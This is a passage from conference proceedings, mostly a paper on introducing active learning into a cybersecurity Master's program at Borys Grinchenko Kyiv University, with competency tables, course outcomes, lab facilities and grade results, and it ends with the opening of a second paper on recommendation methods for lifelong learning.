• The events of 2017–2018, when the large-scale Petya.A attack caused failures in the functioning of Ukrainian state enterprises, institutions, banks, media, etc., among them the Boryspil airport, the Chornobyl NPS, Ukrtelecom, Ukrposhta, Oshchadbank, Ukrzaliznytsia, and a number of other large enterprises [18]; and when the large-scale WannaCry attack compromised office files (Excel, Word, PowerPoint, OpenOffice), music and video files, email messages and mail archives, MS SQL and MS Access database files, and graphic files (MS Visio, Adobe Photoshop) in more than 150 countries [19].
This variety and extent of cyber operations, which have recently accompanied the development of humankind, has motivated the search for solutions for protecting the information that is produced, processed, stored, and disseminated in information and telecommunication systems and networks (ITCM), as well as the ITCM themselves in which such information circulates, from security-related events and incidents (see Table 1) [20].
The purpose of this study is to track the results of the implementation of the active learning methodology on the example of a technical specialty (cybersecurity). Research tasks:
1. Consideration of successive historical challenges in the study of information security.
2. Rapprochement of employers' expectations and the fundamental skills of young cybersecurity professionals.
3. Formation of the structure of the training program: a list of skills and competencies.
Table 1. Stages of the development of security systems

Stage | Period | Characteristics | Security education aspects
Initial | 1940s–mid-1950s | 1. Early stage of electronic computer development. 2. Primary orientation at physical protection | The issue of security is considered only in military educational institutions
I | mid-1950s–early 1960s | 1. Beginning of batch processing of data combined with a program. 2. Emergence of input and output devices. 3. Orientation at restricting access to specialists | Basic approaches to teaching methods of secure data storage are being formed
II | early and mid-1960s | 1. Division of programs and data into separate segments. 2. Functioning of electronic computers under multi-task and time-division conditions. 3. Introduction of security systems for OS. 4. Introduction of storage area protection segments | The foundation of information security is being laid, becoming widely available in technical higher educational institutions
III | mid-1960s–mid-1970s | 1. Emergence of file systems and multi-user OS. 2. Differentiation of access to resources. 3. Development of guaranteed protection of OS | Training programs are being actively developed, but information technologies are experiencing an acute shortage of specialists
IV | mid and late 1970s | 1. Introduction of higher-level services. 2. Orientation at the protection of split systems and databases. 3. Splitting up at the security services level | Engineers' training to maintain rapidly growing information systems for industry and business is being put on stream
V | 1980s | 1. Emergence of personal electronic computers. 2. Orientation at data protection in personal electronic computers. 3. Orientation at data protection in OS. 4. Disabling of access to protection mechanisms | Trusted Computer System Evaluation Criteria become the basis for forming approaches to creating secure information systems
VI | 1990s | 1. Emergence of computer networks. 2. Introduction of a security model of open systems interaction. 3. Introduction of global network security services. 4. Security standardization | The formation of local and global information systems leads to many new threats. Educational institutions are actively creating their networks or connecting to existing ones
VII | 2000s | 1. Introduction of integral security management systems. 2. Introduction of systems for detecting vulnerabilities and penetrations. 3. Standardization of security management. 4. Introduction of OS with dynamic change of security policy | The formation of cybersecurity as a fundamental area of research has allowed the formation of narrow specialties that make it possible to protect data, programs, and information systems, investigate incidents, etc.
VIII | 2010–present | 1. Beginning of a series of attacks on critical infrastructure. 2. Introduction of national cybersecurity agencies. 3. Establishing global exchange of information on cyber incidents. 4. Establishing cyber police and cyber forces | The rapid change of the technological stack leads to the total obsolescence of approaches, methods, and materials for training specialists. The teacher constantly develops himself and solves practical problems with the students
4. Adapting the current process to the modern challenges of active learning and implementing innovative methods of interaction with students.
5. Implementation of the training program on the example of a specific higher education institution.
6. Study of the results of students' progress and involvement in the educational process.
2 Theoretical Basis of the Research
Training high-quality specialists in this specialty will make it possible to build a capable cadre of professionals able to prevent cyber-attacks in Ukraine. The study uses training data for the three years preceding the implementation of the active learning methodology and the results obtained after it; in a certain sense, this material is descriptive. The sequence of implementation implies the atomicity of competencies and the synthesis of knowledge.
This study attempts to introduce active learning methods that have proven successful in European technical schools. For example, in Germany (Technische Hochschule), France (Grande École), and Sweden (Tekniska Högskola), engineering schools operate on very similar principles and differ from liberal arts schools in their practical component. There are several areas of study:
• Specialized courses that cover only a list of specific tasks. Such courses allow one to quickly understand a particular technology or approach but do not give a complete picture. Training and certification are quite expensive. The courses contain many practical tasks.
• Vendor training is usually cheaper but requires paid certification and regular requalification. The specialist is very dependent on market conditions and vendor stability. Practice is only on equipment from one ecosystem, so it is difficult for a specialist to move to an adjacent domain.
• Classical university education provides an excellent mathematical and algorithmic basis but lags behind the relevance of modern technologies. Training a specialist is expensive, as it takes a long time, and the graduate needs some time to adapt to the labor market.
As can be seen, each of these systems has its drawbacks; therefore, new training approaches are required to produce high-quality specialists. The basis for the solution to the problem stems from the prediction of the global transformation of competencies within the next 4–5 years made by World Economic Forum analysts; the main principles of the Cybersecurity Reference Curriculum elaborated in 2017 by the "Partnership for Peace" Consortium working group [28]; the recommendations of the international project ENGENSEC "Educating the Next Generation Experts in Cyber Security: the New EU-recognized Master's Programs," implemented in our country with the support of the European Commission in 2013–2016 under Agreement No. 2013-5084/001-001 on cooperation between Ukraine and the EU (Table 2); international standards such as the National Science Education Standards, NRC & NAP [29], and K-4 and 9–12 "Science and research. The development of student knowledge and skills" [30]; and the CDIO Standard 2.1 initiative [31, 32].
According to the international community [25], the skills that will be most in demand in the near future are the following:
• Ability to solve complex tasks.
• Critical thinking.
• Creativity.
• Managing people.
• Coordination and cooperation.
• Emotional intelligence.
• Decision making.
• Client orientation.
• Negotiation.
• Cognitive flexibility.
The set of necessary competencies formed by state bodies at different levels is shown in Fig. 1.
Fig. 1. Levels of formation of competences
Table 2. Recommendations of the international project ENGENSEC

Course | Previous knowledge | Learning outcomes
Web Security Technologies | Web resource and programming language architecture, protocols for web resources (PHP, SQL, HTML, HTTP, IP, TCP, UDP, Java, JavaScript) | To know existing vulnerable points in web resources and how to deal with them at the stages of development and exploitation, and the patterns for designing secure web applications
Wireless and Mobile Security Technologies | Leading wireless technologies (Wi-Fi, LTE, Bluetooth, WiMAX, CDMA, GSM, UMTS), principles of channel formation and encryption, wireless protocols | To know vulnerable points and methods of dealing with them in wireless and mobile networks and special network equipment for securing such networks; to be able to detect penetration threats and to design secure wireless systems
Network Security Software Development Technologies | Protocols of the transport and network levels of the OSI model and frame structure, programming languages (C++, Java, Assembler), the architecture of operating systems | To know how to use methods and means of designing and testing software for detecting and eliminating activities that threaten system security (antiviruses, firewalls, sniffers, port scanners, etc.)
Advanced Network and Cloud Security Technologies | OSI protocol stack (TCP, UDP, IP), network packets, addressing, network construction principles, network equipment, cloud system construction principles, cryptography basics | To know the vulnerable points and methods of dealing with them in telecommunication technologies, special network equipment for securing corporate networks, and forms of secure data transmission in an insecure environment; to design secure wired systems
Counteracting Malicious Software (Malware) Technologies | Programming languages (C++, Java, Assembler), operating system architecture | To conduct a semantic analysis of files, detect malicious software, restore damaged information, model security vulnerabilities, and use design patterns to secure software
Applied Aspects of Testing for Penetration and Ethical Hacking | Existing web-resource vulnerabilities (SQL injections, brute force, XSS, etc.), web-resource architecture, programming languages and protocols for web resources (PHP, SQL, HTML, HTTP, IP, TCP, UDP, Java, JavaScript) | To know methods and means of testing network resources for security vulnerabilities and to find ways of eliminating them
Security Incidents Investigation Technologies (Digital Forensics) | — | To know how to organize incident investigation processes in accordance with the standards ISO 27001, ISO 27035, ISO 27037, ISO 27031, ISO 20000, ISO/IEC TR 18044, NIST SP 800-61, CMU/SEI-2004-TR-015
The higher levels lead to changes at the lower ones and, consequently, affect the teaching process. The global criterion that combines basic skills and sub-skills and facilitates the formation of the necessary competencies at the various levels is active (practice-oriented) learning. Through this criterion, a close relationship is established between knowledge, skills, and employers' requirements. The main principle, in its turn, is conceiving based on the use of design technologies and readiness for the constant implementation and operation of prospective ideas and innovations, i.e., CDIO: conceiving, designing, implementing, and operating.
While collecting information about Ukrainian higher education institutions (HEI) that offer training in the specialty 125 "Cybersecurity," it was found that out of 49 licensed HEI:
• Only 25 HEI train specialists at the 2nd (Master's) level.
• Only three of these 25 HEI have a publicly accessible Education-Professional Program (EPP) for the 2nd (Master's) level.
• Only a few of the EPP in the HEI under analysis take into account employers' requirements for training high-quality cybersecurity specialists at the Master's level.
Proceeding from this, we point out the primary factors considered during the implementation of active training for the specialty "Cybersecurity" at Borys Grinchenko Kyiv University:
• The individual nature of assignments is determined by the different sets of skills and competencies of applicants, since not only Bachelor's graduates with corresponding training but also graduates of related specialties can apply for the Master's program. It implies choosing the thesis subject according to the student's previous knowledge, skills, and sub-skills, and approving the Master's thesis plan during the first two months of study, since all further research, course papers, and various types of practical training can eventually become elements of the Master's thesis.
• Focus on the result is conditioned by the student being primarily interested in the subject of the Master's thesis and oriented toward gaining engineering and scientific experience rather than assessment results. It is characterized by (a) the need to develop experimental models and systems within one of the Master's courses and (b) the need to ensure the transparency of the Master's thesis results through publications: conference abstracts, articles, etc. It is essential to consider the shortage of time for preparing and conducting the experiment and formalizing its results, as well as the time needed for indexing publications (primarily conference abstracts and articles) in academic citation databases.
3 Research Results
Figure 2 shows the scheme of skill formation in a Master's EPP, the basis of which is the technology of active learning. The employer determines professional skills (hard skills) and the criteria for forming universal competencies (soft skills). At the first level, the employer defines technical instructions, requirements for personnel, and the number of specialists needed. This makes it possible:
• At the 2nd level, to form technical and personal skills correctly.
• At the 3rd level, through the introduction of syllabi, to master and reinforce the skills and knowledge gained in active learning.
• At the 4th and final level of active learning, to bring graduates to employment. The career of graduates does not necessarily have to be related to the employer who makes the request; in that case, the specialist will have to compete with all the other experienced specialists available in the labor market.
Among universal soft skills (see Fig. 2), separate blocks are singled out: critical competencies, general competencies (detailed in Table 3), and professional competencies (Table 4). The critical competence includes solving complex tasks and problems in information and cybersecurity and is characterized by uncertainty of conditions and requirements. As a result, all professional competencies and learning outcomes comply with the critical competencies.
Fig. 2. Formation of an actual education process
Table 3. List of general competencies (Master's degree)

Index | Description
GC-1 | An ability to master various communicative styles (unofficial, official, and scholarly) in the official and a foreign language
GC-2 | An ability to work in a team and to gain new professional knowledge and practical skills for use in professional activity
GC-3 | An ability to identify problematic aspects in the area of cybersecurity and to analyze, evaluate, and solve them
GC-4 | An ability to synthesize new ideas, conduct scientific research, and implement technical developments in the professional area at the corresponding level (for the EPP)
Table 4. List of professional competencies (Master's degree)

Index | Description
PC-1 | An ability to evaluate physical, technological, informational, and sociological processes in the information and/or cyber environment
PC-2 | An ability to apply mathematical skills, system analysis, and synthesis to solve urgent problems of cybersecurity systems and data protection
PC-3 | An ability to apply up-to-date information and communication technology to the development of cybersecurity and data protection systems
PC-4 | An ability to make evaluations and find the necessary solutions in cybersecurity and data protection systems under conditions of assumptions and limitations
PC-5 | An ability to discover vulnerabilities, secure wired and wireless networks, investigate cybersecurity incidents, and counteract malicious software code
PC-6 | An ability to ensure the security of network and web resources and to restore their regular functioning after failures and breakdowns of various types and origins
Figure 3 presents a structural-logical scheme of the formation of the two-year Master's EPP for the specialty "Cybersecurity" based on the recommendations of the international project ENGENSEC "Educating the Next Generation Experts in Cybersecurity: the New EU-recognized Master's Program," with the additional introduction of other courses and/or disciplines, such as "Mathematical Methods of Cryptography" and "Methods of Formation and Analysis of Cryptosystems," practical training, and the presentation of the Master's thesis.
Fig. 3. Schedule of an educational process
The matching of the disciplines and practical training of the Master's program for the specialty "Security of Information and Communication Systems" with general and professional competencies is illustrated in Fig. 4. The relations between the formation of competencies at the 1st (Bachelor's) and 2nd (Master's) levels of higher education can be illustrated by the example of the course "Technologies of Wireless and Mobile Networks Security" (Fig. 5).
Fig. 4. Matching Master’s disciplines and practical training of EPP “Security of information and communication systems” with corresponding competences
Fig. 5. Relations between competencies at the Bachelor’s and Master’s levels for the course “Technologies of wireless and mobile networks security”
As can be seen from the figure, the block of Bachelor's training is indicated in blue, while the block of Master's training is in yellow; the indices "b" and "m" stand for Bachelor's and Master's competencies, respectively. As shown in Fig. 5, the professional competencies PCm-1, PCm-2, PCm-4, and PCm-5 begin to form at the Bachelor's level in the process of teaching the corresponding disciplines. At the Master's level, these competencies continue to develop and, similarly to the Bachelor's program, this process is ensured by specific disciplines. The practical learning outcomes of the two-year Master's program are shown in Table 5.
At Borys Grinchenko Kyiv University, two large scientific and research centers have been established to serve as the physical infrastructure for Bachelor's and Master's training in the specialty "Cybersecurity": the "Centre of Studying Technologies of Information-Communication Systems and Networks Functioning and Security," which includes the "Laboratory of Computer Networks (Cisco)" and the "Laboratory of Information and Communication Systems Security," and the "Centre of Study of Information Assets Security Technologies," which includes the "Laboratory of Technical and Cryptographic Information Security," the "Laboratory of Information Assets Security" (its cyber training site structure is shown in Fig. 6), and the "Laboratory of Computer Virology."
In the computer classes of the centers (Fig. 7), various software and hardware are installed: the DS Office and DS LifeCycle Management System, the SearchInform information security contour (Belarus), the network protection software "Loza," "Gryf," and "Rubizh RSO," an IP-traffic cryptographic protection contour (Avtor, Kyiv), an antivirus protection stand (ESET, Slovakia), a key certification center (Institute of Information Technologies, Kharkiv), etc. This makes it possible:
• First, to study high-level programming languages (C/C++, Java, JavaScript, PHP, Python), modern mathematical packages (MatLab) and application packages (MathCad), as well as the specifics of the functioning and security of modern operating systems and databases.
• Second, to install and configure Cisco switches and routers in multiprotocol networks, detect and eliminate failures in LAN and WAN networks, increase network performance and security, and administer medium-sized networks.
• Third, to organize data search and collection, study models of data protection (in cloud data storage in particular), model the processes of maintaining the necessary security level of data assets, eliminate the consequences of cyberweapon application, and restore the normal operation of data objects and cyberinfrastructure.
• Fourth, to construct virtual private networks (VPN), secured IP and TCP networks, and secured inter-network connections; to build IP-traffic security systems based on the IPsec ideology (RFC 2401); to service users' public key certificates; and to provide users with digital encryption keys, data encryption, and the means of key generation and control.
• Fifth, in real time, to detect and manage incidents of increased complexity, collect data, detect anomalies and signs of security policy breaches, detect zero-day threats, and protect against ransomware (cyber blackmail).
Table 5. Practical learning outcomes

Index | Description
PLO-1 | 1. To be able to apply knowledge of foreign languages to ensure the efficiency of professional communication. 2. To diagnose and interpret situations, plan and conduct scientific research, and think critically about theories, principles, methods, and categories in education and professional activity. 3. To present knowledge and skills in the theory and practice of ICS in oral and/or written form for professional and non-professional audiences
PLO-2 | 1. To identify and formulate urgent scientific problems and to generate and integrate new ideas and new knowledge in the area of information and cybersecurity. 2. To be able to apply specialized software packages and current information technology. 3. To know the vulnerabilities and methods of their exploitation in various telecommunication technologies. 4. To know the ways of dealing with these vulnerabilities and the specialized network equipment used to secure corporate networks. 5. To be able to design secure (with threats taken into account) wired telecommunication systems. 6. To know methods of organizing secure data transmission in an insecure environment
PLO-3 | 1. To know vulnerabilities and methods of their exploitation in wireless and mobile networks. 2. To know how to detect threats of penetration or perpetrators' access to such networks. 3. To know specialized equipment for securing wireless and mobile networks. 4. To be able to design secure (with threats taken into account) wireless networks
PLO-4 | To know methods and means of developing and testing software for detecting and eliminating activities that threaten system security (antiviruses, firewalls, sniffers, port scanners)
PLO-5 | 1. To know how to conduct semantic analysis of files. 2. To be able to detect malicious software and files by their structure and behavior. 3. To be able to restore damaged data. 4. To be able to model software vulnerabilities and use design patterns for software protection
PLO-6 | 1. To know existing vulnerabilities of web resources (SQL injections, brute force, XSS, etc.) and the methods of dealing with them at the development and exploitation stages. 2. To know design patterns of secure web applications
PLO-7 | 1. To know methods and means of testing network resources for security vulnerabilities. 2. To know how to find ways of eliminating them
PLO-8 | To organize incident investigation processes in accordance with the standards ISO 27001, ISO 20000, ISO 27035, ISO 27037, ISO 27031, ISO/IEC TR 18044, NIST SP 800-61, CMU/SEI-2004-TR-015
PLO-9 | 1. To use practical skills in auditing, administering, and operating information and cybersecurity systems. 2. To design prospective cryptosystems and apply modern technologies of cryptographic data protection in information and/or cybersecurity systems
• Sixth, to detect radio-bugging devices, ensure the protection of information from leaking out through technical channels, and control access to information activity objects. • Seventh, to construct the systems of management of information security by the standards of ISO 17799:2005 and ISO 2700, to carry out an independent and regular analysis of risks and manage its results (DS Office 2012), to maintain a necessary security level of enterprise data assets without unnecessary expenses and non-optimal resource exploitation (DS LifeCycle Management System 2012), etc.
Fig. 6. Cyber training site structure
Fig. 7. Server equipment (a) and laboratory complex (b) of the center
4 Results of Active Learning Implementation

Table 6 shows the results obtained by Borys Grinchenko Kyiv University in the period from 2017 to 2019 for seven main disciplines of professional training at the 2nd (Master's) higher education level for the specialty 125 "Cyber Security," the branch of knowledge being 12 "Information Technology." The availability of an integrated curriculum, the stages of design and implementation, technical platforms, the practical component of active learning, and the state of in-service training of teachers for each of these disciplines serve as the leading indicators of success in this study. In Table 6, the sign "+" refers to the requirements of the CDIO initiative that we have implemented in full, the sign "–" indicates the conditions of the CDIO initiative that we have implemented partly, and the sign "±" refers to aspects postponed to the next year and concerns those disciplines of the Master's program that will be introduced only in the following academic year.

Table 6. Key performance indicators as required by CDIO

| Course | Comprehensive syllabus | Development and implementation | Technical platforms | Active learning | In-service teacher training |
|---|---|---|---|---|---|
| Web-resources security technologies | + | + | + | + | + |
| Security technologies for wireless and mobile networks | + | + | ± | + | + |
| Network security software development and testing technologies | + | + | + | ± | ± |
| Network infrastructure security technologies | + | ± | + | ± | ± |
| Technologies for counteracting malicious code | ± | ± | + | – | + |
| Applied aspects of penetration testing and ethical hacking | ± | – | + | ± | + |
| Investigation of security incidents technologies | ± | – | + | – | ± |
More significant results were obtained by the students of the State University of Telecommunications and Borys Grinchenko Kyiv University who studied the discipline "Wireless and Mobile Network Security Technologies." The sample of students who studied this discipline before the introduction of Active Learning technologies into the educational process comprised 45 people; after the implementation, their number grew to 57.
To determine the possible effects of implementing active learning in the curricula of Ukrainian HEIs, we analyzed the distribution of students' success assessments (Fig. 8). The ECTS alphabetical scale has been used instead of the 100-point scale (see Table 7) to average the results obtained.

Table 7. ECTS grading scale used in this study

| Grade | Score |
|---|---|
| A | ≥90 |
| B | ≥82 |
| C | ≥75 |
| D | ≥69 |
| E | ≥60 |
| F | ≥35 |
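As an aside, the threshold mapping in Table 7 is straightforward to apply programmatically. The following minimal Python sketch is our own illustration (the function name and the handling of scores below 35 are assumptions, not part of the study):

```python
# Hypothetical helper: map a 100-point score to the ECTS letters of Table 7.
# Thresholds are checked from the highest band down.
def ects_grade(score: float) -> str:
    bands = [(90, "A"), (82, "B"), (75, "C"), (69, "D"), (60, "E"), (35, "F")]
    for cutoff, grade in bands:
        if score >= cutoff:
            return grade
    return "F"  # Table 7 lists no band below 35; we treat such scores as F too.

print(ects_grade(76.3))  # -> "C" (the pre-implementation average grade)
print(ects_grade(79.3))  # -> "C" (the post-implementation average grade)
```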
Fig. 8. Students’ success (1) before and (2) after implementation of active learning
As can be seen from the obtained results (Fig. 8), the distribution of grades becomes more homogeneous: the distribution curve before the introduction of Active Learning is close to the Laplace distribution, whereas after its implementation it becomes similar to the χ2 distribution with 4 degrees of freedom. The average grade increases by 3 points (from 76.3 to 79.3). Because the internal assessment of our students does not fully reflect their academic performance, the quality of Active Learning implementation for the specialty 125 "Cyber Security" of the branch of knowledge 12 "Information Technology" was additionally confirmed by external testing at the Cisco Networking Academy. For this purpose, the experimental course closest to the discipline "Wireless and Mobile Network Security," namely "IoT Fundamentals: IoT Security" (version 1.0), was selected. Students were given one week to familiarize themselves with the course materials and to take the corresponding exam. The passing score of the Cisco course is set at 75. All Cyber Security Master's Degree students at Borys Grinchenko Kyiv University completed the task,
received passing grades and corresponding certificates, which correlated with the results obtained earlier [34].
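For readers who wish to reproduce this kind of distributional analysis on their own grade data, a minimal sketch is given below. The samples are synthetic placeholders (the paper does not publish the raw grade lists), and the use of a Kolmogorov–Smirnov test against a fitted Laplace curve is our own illustration rather than the authors' procedure:

```python
import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
# Synthetic placeholders standing in for the real grade samples (45 and 57 students).
before = rng.laplace(loc=76.3, scale=8.0, size=45).clip(35, 100)
after = (60 + 4.85 * rng.chisquare(df=4, size=57)).clip(35, 100)

for name, sample in [("before", before), ("after", after)]:
    loc, scale = stats.laplace.fit(sample)            # fit a Laplace curve
    ks = stats.kstest(sample, "laplace", args=(loc, scale))
    print(f"{name}: mean={sample.mean():.1f}, KS-vs-Laplace p={ks.pvalue:.3f}")
```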
5 Approbation and Utilization of Research Outcomes

The experience of implementing the Active Learning Method has been presented and discussed at the scientific and practical events and conferences shown in Table 8.

Table 8. Events at which the experience of active learning implementation was presented

| Date | Title of the report | Event and place | Speaker |
|---|---|---|---|
| 11/15/2018 | Implementation of World Methods of Active Learning in 125 Cyber Security Master's Degree Program | Workshop "The Educational Aspect of Cyber Security," Kyiv [35] | V. Sokolov, PhD |
| 11/29/2018 | Introduction of Active Learning Technologies into the Educational Process at Borys Grinchenko Kyiv University | Cyber Security & Intelligent Manufacturing Conference, Changsha, China [36] | V. Buriachok, DSc, Prof |
| 12/01/2018 | Active Learning: Implementation and Promotion | Project Contest for Student Action Participants: Student Leadership Competency Development Program, British Council, Ramada Encore, Kyiv [37] | O. Babich, 1st-year student of 125 "Cyber Security" |
| 12/08/2018 | Implementation of practice-oriented training technologies in the educational process at KUBG, 125 "Cybersecurity" | V Annual International Forum of Information Security Experts "Information Security: Current Trends – 2018," Kyiv [38, 39] | V. Buriachok, DSc, Prof |
| 01/26/2019 | Implementation of Active Learning in the Master's Program on Cybersecurity | II International Conference on Computer Science, Engineering and Education Applications (ICCSEEA 2019), Kyiv [34] | V. Sokolov, PhD |
During the presentation of this experience and of the course materials with active learning, shortcomings have been identified and are being eliminated in further development. For example, part-time students typically face a critical shortage of practical classes. Active learning makes it possible to restructure the busy session time into supervision of independent work and engaging, productive work. Moreover, the practice of involving students early gives excellent results in preparing Bachelor's theses: by the middle of the third year, students understand what they would like to do, so the topic of the thesis becomes detailed, with practical results and prototypes.
6 Conclusions and Future Research

Cybersecurity, as a part of information technology, requires constant professional development for teachers, which makes it a suitable case for studying the implementation of active learning methods. Referring to Borys Grinchenko Kyiv University as an example,
the paper highlights one of the possible approaches to forming a competence model based on the technology of Active Learning. This approach can serve as the foundation for developing educational programs and curricula for the high-quality training of professionals of the 2nd (Master's) level of education for the specialty 125 "Cyber Security" of the branch of knowledge 12 "Information Technology" in the higher education institutions of Ukraine. This approach will enable:
• to train highly qualified professionals capable of effectively fulfilling tasks of an innovative character in telecommunications and information technologies, pedagogy, and the methodology of higher education;
• to cover information and cybersecurity issues, especially in Kyiv (including managing the IT and technical security of information) and in Ukraine as a whole;
• to ensure an appropriate level of interaction with higher educational institutions of the world's leading countries in improving the training of information and cybersecurity specialists.
Such training will make it possible to coordinate the actions of state and business structures in engaging competent and qualified specialists in information and cybersecurity, etc. Besides, it should, first, contribute to the reliable and efficient functioning of the state and commercial sectors of Ukraine's national security and economy, enhancing our state's cybersecurity and defense capability. Secondly, it should increase the attractiveness of this specialty for both state and commercial institutions and agencies providing information and cybersecurity services to individuals and to various industrial and banking structures in Kyiv. These conclusions are supported by the study of graduate students' average scores, which increased by three points, from 76.3 to 79.3. According to the study's results, students' active involvement in solving applied problems in the learning process increases academic performance and student interest. Further research is intended to focus on a more thorough study of interdisciplinary links, which will provide students with a high-quality educational and professional program, and on the extension of the latter to all levels of cybersecurity training, including pre-service and in-service training.

Acknowledgments. The authors are grateful to EU ENGENSEC Project Manager Anders Carlson from the Chair of Computer Science and Engineering (Department of Technology of Institute of Technology in Blekinge, Karlskrona, Sweden) for the assistance in developing the Master's Program in Cyber Security [40].
References

1. Cohen, F.: Computer viruses: theory and experiments. Comput. Secur. 6(1), 22–35 (1987)
2. Alizar, A.: HP Information Security Report 2013. http://xakep.ru/2014/02/04/61990/
3. McAfee LLC: McAfee Labs Threats Report. https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-dec-2018.pdf
4. International Telecommunication Union: Security in Telecommunications and Information Technology. https://www.itu.int/dms_pub/itu-t/opb/tut/T-TUT-SEC-2015-PDF-E.pdf
5. CyberEdge Group LLC: Report Defense Cyberthreat (2018). https://cyber-edge.com/wp-content/uploads/2018/03/CyberEdge-2018-CDR.pdf
6. World Economic Forum: The Global Risks Report. http://www3.weforum.org/docs/WEF_GRR18_Report.pdf
7. R-Vision: Information Security Projections for 2018. https://rvision.pro/en/blog-posts/prognozy-po-informatsionnoj-bezopasnosti-na-2018-god/
8. Euronews: Davos 2018: A Joint Response to Global Threats. https://en.euronews.com/2018/01/24/davos-2018-what-are-humanitarian-organisations-bringing-to-the-world-economic
9. Zakhmatov, V.D.: Multifaceted Protection Technique (1991)
10. Manachinsky, A.Y.: Iraq: At the Epicenter of the Wars (2015)
11. Kessler, B.: The vulnerability of nuclear facilities to cyber attack. Strateg. Insights 10, 15–25 (2011)
12. North Atlantic Alliance: NATO-Ukraine Expert Consultations on Cyber Security. https://www.nato.int/cps/en/natohq/news_61562.htm?selectedLocale=en
13. Ukrainian News: The Undeclared War in Cyberspace (2010). http://economica.com.ua/tele/article/625008.html
14. BiZUA: The 20 Biggest Cybercrimes of the 21st Century (2015). https://bizua.org/351/20najguchnishix-kiberzlochiniv-xxi-stolittya
15. MITRE: Software: NetTraveler—ATT&CK for Enterprise. https://attack.mitre.org/software/S0033
16. GReAT: Operation Red October as an Extensive Network of Cyber Espionage against Diplomatic and Governmental Structures. https://securelist.com/the-red-october-campaign-an-advanced-cyber-espionage-network-targeting-diplomatic-and-government-agencies/3632/
17. Media-DC: The Largest Cyber-Attacks against Ukraine Since 2014. Infographics. https://nv.ua/eng/ukraine/events/najbilshi-kiberataki-proti-ukrajini-z-2014-roku-infografika-1438924.html
18. Unian: Mass Attack of Petya A Virus: Suspected Hackers Made First Statement. https://www.unian.net/science/2013686-massovaya-ataka-petyaa-yakobyi-stoyaschieza-virusom-hakeryi-sdelali-pervoe-zayavlenie.html
19. Today: WannaCry Attack: How to Protect Your Computer from a Dangerous Virus. https://www.segodnya.ua/lifestyle/science/ataka-wannacry-kak-zashchitit-kompyuter-otopasnogo-virusa-1020872.html
20. Burov, O., et al.: Cybersecurity in educational networks. In: Ahram, T., Karwowski, W., Vergnano, A., Leali, F., Taiar, R. (eds.) IHSI 2020. AISC, vol. 1131, pp. 359–364. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-39512-4_56
21. Poroshenko, P.: The Law of Ukraine on Basic Principles of Cyber Security of Ukraine. https://zakon.rada.gov.ua/laws/show/2163-19/print
22. Danik, Y.G., Suprunov, Y.M.: Some approaches to formation of the training system for the cyber security system of Ukraine. Collect. Sci. Pap. Sci. Inf. Inst. Inf. Sci. Ukr. 5, 5–22 (2011)
23. Minochkin, A.I.: Information struggle: current state and expertise of expert training. Def. Bull. 2, 12–14 (2011)
24. Sysoev, V.: Analysis of the level of education and training of IT and information security professionals in Ukraine, CISM (2011)
25. Buriachok, V.L., Bogush, V.M.: Recommendations for the development and implementation of a cyber security training profile in Ukraine. Ukr. Sci. J. Inf. Secur. 20, 126–131 (2014)
26. Hu, Z., Buriachok, V., Sokolov, V.: Implementation of social engineering attack at institution of higher education. In: International Workshop on Cyber Hygiene, pp. 155–164 (2020)
27. Buriachok, V., et al.: Model of training specialists in the field of information and cyber security in higher education institutions of Ukraine. Inf. Technol. Teach. Aids 5, 277–291 (2018)
28. Costigan, S.S., Hennessy, M.A.: Cybersecurity: A Generic Reference Curriculum. https://www.nato.int/nato_static_fl2014/assets/pdf/pdf_2016_10/20161025_1610-cybersecurity-curriculum.pdf
29. National Research Council: National Science Education Standards. The National Academies Press, Washington (1996)
30. Dori, Y.J., et al.: Technology for active learning. Mater. Today 6(12), 44–49 (2003)
31. Martin, J., Wackerlin, D.: CDIO as a cross-discipline academic model. In: Proceedings of the 12th International CDIO Conference, pp. 986–1003 (2016)
32. Buriachok, V.L., Sokolov, V.Y.: CDIO Initiative. Kyiv (2019)
33. Sokolov, V., Taj Dini, M., Buriachok, V.: Wireless and Mobile Security: Laboratory Workshop. Kyiv (2017)
34. Buriachok, V., Sokolov, V.: Implementation of active learning in the master's program on cybersecurity. In: Hu, Z., Petoukhov, S., Dychka, I., He, M. (eds.) ICCSEEA 2019. AISC, vol. 938, pp. 610–624. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-16621-2_57
35. Sokolov, V.: Implementation of Global Active Learning Techniques in the Master's Degree Program in Cyber Security 125. http://kubg.edu.ua/prouniversitet/news/podiji/5698-vprovadzhennia-innovatsiinykh-tekhnolohii-kiberbezpeky-v-universyteti.html
36. Buriachok, V.L.: Introduction to Active Learning Technologies in Borys Grinchenko Kyiv University Educational Process. http://www.yuanshihui.cn/detail/8e6847e3bb1000fa66141bb2
37. Babich, O.M.: Student Action: A Student Leadership Competence Development Program. http://www.britishcouncil.org.ua/programmes/education/student-action-2018
38. Buriachok, V.L.: Introduction of Practice Oriented Learning Technology in Specialty 125 "Cybersecurity" into the University's Educational Process. http://ij.kubg.edu.ua/pro-instytut/news/podiji/943-forum-ynformatsyjna-bezpeka.html
39. Hu, Z., Buriachok, V., Bogachuk, I., Sokolov, V., Ageyev, D.: Development and operation analysis of spectrum monitoring subsystem 2.4–2.5 GHz range. In: Radivilova, T., Ageyev, D., Kryvinska, N. (eds.) Data-Centric Business and Applications. LNDECT, vol. 48, pp. 675–709. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-43070-2_29
40. Carlsson, A., et al.: Remote security labs in the cloud ReSeLa. In: IEEE Global Engineering Education Conference, pp. 1–8 (2015). https://doi.org/10.1109/educon.2015.7095971
Recommendation Methods for Information Technology Support of Lifelong Learning Situations

Mykhailo Savchenko(B), Kateryna Synytsya, and Yevheniya Savchenko-Synyakova

International Research and Training Center for Information Technologies and Systems, Kyiv, Ukraine
[email protected]
Abstract. In a rapidly changing world, learning through life becomes an important part of personal and professional development in formal, informal, or non-formal environments. A variety of e-learning content and activities are available to meet the learning demands of individuals. However, lifelong learners need advice or guidance in their search for learning experiences corresponding to their needs and preferences. Recommendation techniques are applied to facilitate a user's choice of a product in different contexts, including education. They rely on the available information about users' preferences and on similarity measures for users and products, and thus operate mostly within an isolated recommendation system. This research is aimed at identifying appropriate recommendation methods for intelligent e-learning support of the lifelong learner. The study reveals four types of lifelong learning situations with a different primary recommendation method in each case. A generalized schema for providing recommendations in lifelong e-learning is suggested.

Keywords: Recommendation methods · information technology · e-learning support · lifelong learning · modeling
1 Introduction

